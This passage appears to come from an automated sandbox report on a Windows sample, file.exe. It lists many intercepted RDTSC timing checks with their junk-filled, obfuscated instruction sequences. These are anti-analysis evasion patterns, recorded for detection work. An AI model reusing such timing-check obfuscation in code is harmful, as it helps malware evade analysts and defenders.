0x0000006a pushad 0x0000006b push ebx 0x0000006c pop ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1696 second address: 5C169B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C169B second address: 5C16C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F37B45370AFh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F37B453709Dh 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8DDD second address: 5C8E02 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B4535CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F37B4535CE9h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8E02 second address: 5C8E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDBFE second address: 5CDC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F37B4535CDAh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDD83 second address: 5CDDA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDDA0 second address: 5CDDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDF15 second address: 5CDF1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE099 second address: 5CE0B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D5AC4 second address: 5D5ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D952C second address: 5D9532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B25 second address: 5D9B3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F37B45370A1h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B3C second address: 5D9B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F37B4535CD6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9B46 second address: 5D9B50 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F37B4537096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9C8A second address: 5D9CAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE6h 0x00000007 jmp 00007F37B4535CDBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CAF second address: 5D9CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B453709Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D9CC3 second address: 5D9CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA289 second address: 5DA294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F37B4537096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA3E0 second address: 5DA3F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F37B4535CD6h 0x0000000a jng 00007F37B4535CD6h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA3F0 second address: 5DA3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DA6CC second address: 5DA6D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF34B second address: 5DF375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B45370A0h 0x00000007 jmp 00007F37B453709Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007F37B4537096h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF375 second address: 5DF37B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF37B second address: 5DF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3989 second address: 5E39CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 jc 00007F37B4535CDCh 0x0000000d jng 00007F37B4535CD6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F37B4535CE4h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E39CA second address: 5E39E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B45370A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFC29 second address: 5AFC9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F37B4535CE8h 0x00000010 jmp 00007F37B4535CDAh 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F37B4535CD8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 lea eax, dword ptr [ebp+124869D2h] 0x00000037 mov dword ptr [ebp+122D2326h], eax 0x0000003d nop 0x0000003e pushad 0x0000003f push eax 0x00000040 jc 00007F37B4535CD6h 0x00000046 pop eax 0x00000047 jo 00007F37B4535CDCh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFC9C second address: 5AFCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFCA7 second address: 5AFCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFCAB second address: 5AFCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F37B4537096h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFE8F second address: 5AFEA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B4535CE1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B01F6 second address: 5B0204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jng 00007F37B4537096h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0338 second address: 5B033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B033C second address: 5B034C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B034C second address: 5B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0488 second address: 5B048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0566 second address: 5B059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F37B4535CE0h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 jnl 00007F37B4535CDCh 0x0000001a jg 00007F37B4535CD6h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B059B second address: 5B059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B059F second address: 5B05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B079D second address: 5B07A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B07A1 second address: 5B07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B07A7 second address: 5B07AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B07AD second address: 5B07B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B07B1 second address: 5B07C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F37B453709Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B07C3 second address: 5B07DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F37B4535CE5h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0F32 second address: 5B0F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F37B4537098h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 sbb dx, D0F1h 0x0000002c lea eax, dword ptr [ebp+12486A16h] 0x00000032 call 00007F37B45370A1h 0x00000037 jmp 00007F37B453709Ch 0x0000003c pop edx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0F8F second address: 591331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F37B4535CD6h 0x00000009 jmp 00007F37B4535CDFh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F37B4535CD8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e call 00007F37B4535CE8h 0x00000033 jns 00007F37B4535CE6h 0x00000039 pop ecx 0x0000003a lea eax, dword ptr [ebp+124869D2h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F37B4535CD8h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a push eax 0x0000005b push edi 0x0000005c jmp 00007F37B4535CDBh 0x00000061 pop edi 0x00000062 mov dword ptr [esp], eax 0x00000065 or edx, 05421700h 0x0000006b call dword ptr [ebp+122D3389h] 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007F37B4535CD6h 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591331 second address: 591335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591335 second address: 591339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591339 second address: 59134E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d je 00007F37B4537098h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2A1E second address: 5E2A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F37B4535CDEh 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F37B4535CD6h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2A36 second address: 5E2A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2FC8 second address: 5E2FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F37B4535CE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2FDE second address: 5E3030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F37B4537096h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F37B45370B3h 0x00000014 jmp 00007F37B45370A7h 0x00000019 jng 00007F37B4537096h 0x0000001f jbe 00007F37B45370B1h 0x00000025 jmp 00007F37B45370A5h 0x0000002a jnp 00007F37B4537096h 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3030 second address: 5E3035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3035 second address: 5E303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E333B second address: 5E3369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F37B4535CD6h 0x00000009 jc 00007F37B4535CD6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F37B4535CE8h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3369 second address: 5E336D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7B2A second address: 5E7B71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F37B4535CD6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 jmp 00007F37B4535CE2h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F37B4535CDBh 0x0000001f push edi 0x00000020 pop edi 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 jmp 00007F37B4535CDDh 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7CE4 second address: 5E7CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8117 second address: 5E811D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E811D second address: 5E8125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8125 second address: 5E812F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8294 second address: 5E82A4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E82A4 second address: 5E82A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E82A8 second address: 5E82E2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F37B4537096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F37B453709Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F37B45370A9h 0x00000018 jnp 00007F37B4537096h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E82E2 second address: 5E82F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnc 00007F37B4535CD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E82F4 second address: 5E82F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E86EF second address: 5E86F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E86F5 second address: 5E8730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F37B45370A7h 0x0000000a jmp 00007F37B45370A1h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8730 second address: 5E8735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8735 second address: 5E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E873B second address: 5E873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8882 second address: 5E888D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E888D second address: 5E8893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8893 second address: 5E8897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE819 second address: 5EE822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED640 second address: 5ED646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED646 second address: 5ED64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDCF8 second address: 5EDD03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EDD03 second address: 5EDD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE289 second address: 5EE28E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1443 second address: 5F1465 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F37B4535CF4h 0x00000008 jmp 00007F37B4535CE8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F1465 second address: 5F146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F146D second address: 5F1471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564332 second address: 56434C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F37B45370A6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F65AD second address: 5F65EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F37B4535CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F37B4535CE8h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edx 0x00000017 push eax 0x00000018 pushad 0x00000019 popad 0x0000001a pop eax 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F65EB second address: 5F65F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F65F1 second address: 5F65F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61AD second address: 5F61B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F61B1 second address: 5F61C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jng 00007F37B4535CD6h 0x00000012 rdtsc
